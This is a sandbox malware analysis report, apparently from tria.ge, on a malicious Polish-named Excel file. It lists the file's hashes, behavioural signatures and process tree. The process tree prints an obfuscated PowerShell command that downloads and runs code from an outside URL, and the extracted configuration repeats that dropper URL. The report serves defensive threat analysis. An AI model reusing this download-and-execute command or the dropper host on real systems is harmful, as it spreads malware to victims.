Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
137s -
max time network
131s -
platform
windows10_x64 -
resource
win10 -
submitted
14/07/2020, 14:07
General
-
Target
Potwierdzenie transakcji (5).xls
-
Size
856KB
-
MD5
92d6e6b45a4275700d0f6f57e1b41609
-
SHA1
2d9aa61c33bdcc875e610edac331901ed59a5b44
-
SHA256
2705cadf0dff4e6476415d0d51fafc2e121bdfde7e8649004bf1294a85f17a11
-
SHA512
2d25de03fa17fdbaf4ec0370fbc339a98aca9dd2f203f6ff243c7f61d82108fcea9f61f42b025cf76bcacef86c252d45561b7c8a42d2e00521ca352c88b43158
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://officeservicecorp.biz/Lab.jpg
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Suspicious use of WriteProcessMemory 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious use of SetWindowsHookEx 14 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Potwierdzenie transakcji (5).xls"1⤵
- Suspicious use of WriteProcessMemory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://officeservicecorp.biz/Lab.jpg')2⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-